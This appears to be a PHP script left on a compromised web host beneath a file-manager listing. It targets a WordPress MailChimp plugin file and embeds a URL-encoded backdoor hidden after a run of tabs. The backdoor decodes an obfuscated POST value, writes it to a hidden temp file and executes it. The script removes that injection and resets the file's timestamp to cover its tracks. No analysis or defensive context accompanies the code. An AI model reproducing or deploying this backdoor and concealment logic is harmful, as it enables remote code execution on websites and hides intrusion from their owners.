/
proc
/
thread-self
/
root
/
usr
/
tmp
/
Upload File
HOME
<?php $path = '/home2/joyhucol/public_html/themillennialshandbook/wp-content/plugins/mailchimp-for-wp/includes/admin/class-upgrade-routines.php'; $ft = @filemtime($path); $new_content = str_repeat("\t", 42).rawurldecode('if%28%21is_null%28%24_POST%5B%22e%5Cx6Et%22%5D%20%3F%3F%20null%29%29%7B%20%24data%20%3D%20array_filter%28%5Bsession_save_path%28%29%2C%20%22/dev/shm%22%2C%20%22/tmp%22%2C%20getenv%28%22TMP%22%29%2C%20%22/var/tmp%22%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20getcwd%28%29%2C%20getenv%28%22TEMP%22%29%2C%20sys_get_temp_dir%28%29%5D%29%3B%20%24ent%20%3D%20%24_POST%5B%22e%5Cx6Et%22%5D%3B%20%24ent%20%3D%20explode%20%28%20%22.%22%20%2C%20%24ent%20%29%20%3B%20%24pset%20%3D%20%27%27%3B%20%24salt5%20%3D%20%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%20%24lenS%20%3D%20strlen%28%24salt5%20%29%3B%20foreach%28%24ent%20as%20%24x%20%3D%3E%20%24v5%29%3A%20%24sChar%20%3D%20ord%28%24salt5%5B%24x%20%25%20%24lenS%5D%20%29%3B%20%24d%20%3D%28%28int%29%24v5%20-%20%24sChar%20-%28%24x%20%25%2010%29%29%20%5E25%3B%20%24pset%20.%3D%20chr%28%24d%20%29%3B%20endforeach%3B%20while%20%28%24entity%20%3D%20array_shift%28%24data%29%29%20%7B%20if%20%28%21%28%20%21is_dir%28%24entity%29%20%7C%7C%20%21is_writable%28%24entity%29%20%29%29%20%7B%20%24hld%20%3D%20%22%24entity%22%20.%20%22/.rec%22%3B%20if%20%28%40file_put_contents%28%24hld%2C%20%24pset%29%20%21%3D%3D%20false%29%20%7B%20include%20%24hld%3B%20unlink%28%24hld%29%3B%20exit%3B%20%7D%20%7D%20%7D%20%7D')."\n"; if (file_exists($path) && is_writable($path)) { $content = (string) @file_get_contents($path); if (strlen($content) > 0 && strpos($content, $new_content) !== FALSE) { $candidate = str_replace($new_content, '', $content); $safe = (strlen($candidate) >= 32) && (strpos($candidate, '<?php') !== FALSE || strpos($candidate, '<?=') !== FALSE); if ($safe) { $tmp = @tempnam(dirname($path), 't'); if ($tmp !== false && @file_put_contents($tmp, $candidate) !== false && @rename($tmp, $path)) { @touch($path, $ft); } elseif ($tmp !== false && is_file($tmp)) { @unlink($tmp); } } } } die('!success!');